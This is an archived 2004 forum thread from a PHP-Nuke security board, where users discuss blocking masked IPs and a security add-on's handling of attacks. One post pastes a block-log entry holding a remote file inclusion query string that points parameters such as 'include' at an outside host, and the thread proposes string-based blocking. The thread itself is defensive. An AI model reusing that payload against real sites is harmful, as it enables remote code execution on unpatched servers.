Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
AndyB
Worker
Worker


Joined: Jun 03, 2004
Posts: 231
Location: Torrevieja, Spain

PostPosted: Sun Jun 13, 2004 4:04 pm Reply with quote

Just a thought; there are some software programs that hide your ip, etc. to a cserain extent. I am not sure how well these work; or how they work.

If they do work (and an IP address is not shown- I get a lot of "xxxxxxxxxxxxx" in my server logs) is it possible to stop this/ these from getting access to the site?
 
View user's profile Send private message
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17077

PostPosted: Sun Jun 13, 2004 4:38 pm Reply with quote

Andy, I am totally lost with this post Confused Can you explain some more what your point is? Also, how does this relate to Nuke?
 
View user's profile Send private message
AndyB
PostPosted: Mon Jun 14, 2004 1:51 am Reply with quote

Ok. It is possible to withhold, or hide your IP address (masking?).

Is there anyway that we can set nuke (or Sentinel) to block access to a site IF the IP address is not clearly visible?

Hope that clears it up- if not, I'll try to find details of one of the software packages concerned...

Cheers.

Andy
 
Raven
PostPosted: Mon Jun 14, 2004 3:48 am Reply with quote

You can use a Proxy to 'hide' your true IP, yes, but then Sentinel(tm) will ban the proxy IP. Sentinel(tm) derives the IP in several ways using the HTTP protocol. The xxxxxxxx's you see in your logs still have an IP attached to them.
 
AndyB
PostPosted: Thu Jul 08, 2004 12:59 am Reply with quote

Here's one:
The external linking thing is very common- see lots listed on here so don't see the need to keep adding more to your bandwidth....

That said, I take it Sentinel will block the Remote address? (62.221.221.7)

Top part of the mail below.....



Date & Time: 2004-07-07 21:39:59
Blocked IP: unknown
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: curl/7.11.2 (i386-pc-linux-gnu) libcurl/7.11.2 OpenSSL/0.9.7 ipv6 zlib/1.2.1.1 Query String: Only registered users can see links on this board! Get registered or login!
set_albumName=http://217.59.104.226/&id=http://217.59.104.226/&op=http://217.59.104.226/
&name=http://217.59.104.226/&file=http://217.59.104.226/&include=http://217.59.104.226/
Forwarded For: unknown
Client IP: none
Remote Address: 62.221.221.7
Remote Port: 35828
Request Method: GET
--------------------
Who-Is for IP
OrgName: Unknown Works
OrgID: UNKNOW
Address: 3928 SE Tolman st
City: Portland
StateProv: OR
PostalCode: 97202
Country: US
 
Raven
PostPosted: Thu Jul 08, 2004 5:02 am Reply with quote

Yes, I had one like this also. We're looking into this. It should have blocked it but it didn't.
 
AndyB
PostPosted: Thu Jul 08, 2004 6:05 am Reply with quote

Possibly the wrong forum for this (sorry), but as Sentinel looks for a particular string/ type with the UNION attacks, would it be possible to do something similar where the admin can put in a specific string to watch for and offer it as an option to block/ bounce/ etc?

In this instance the string would be something like "&include=http://217.59.104.226"- since the IP address concerned is causing some problems here (and everywhere else)- if somethings rears it's head in the future- say a different IP address needs to be added, and that can be bounced....

Personally I'd *love* to hammer the daylights out of anybody (or their PC) that attempts to do an extrnal link such as this...

The other option is to totally disable external URL's in the address bar; would this be a quick fix? (So it will only "fetch" from the domain name or a sub domain name)

Just a thought- thanks for your help and hard work on this so far......
 
Raven
PostPosted: Thu Jul 08, 2004 7:08 am Reply with quote

Sentinel traps the http= so, in this instance, it will catch ALL attempts to redirect when an address is detected in the QUERY string. However, I really like that idea about allowing strings to search for.
 
BobMarion
Former Admin in Good Standing


Joined: Oct 30, 2002
Posts: 1037
Location: RedNeck Land (known as Kentucky)

PostPosted: Thu Jul 08, 2004 9:54 am Reply with quote

Will try to get this feature added to 2.0.0 but it may have to wait for 2.1.0 .

_________________
Bob Marion
Codito Ergo Sum
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Send e-mail Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©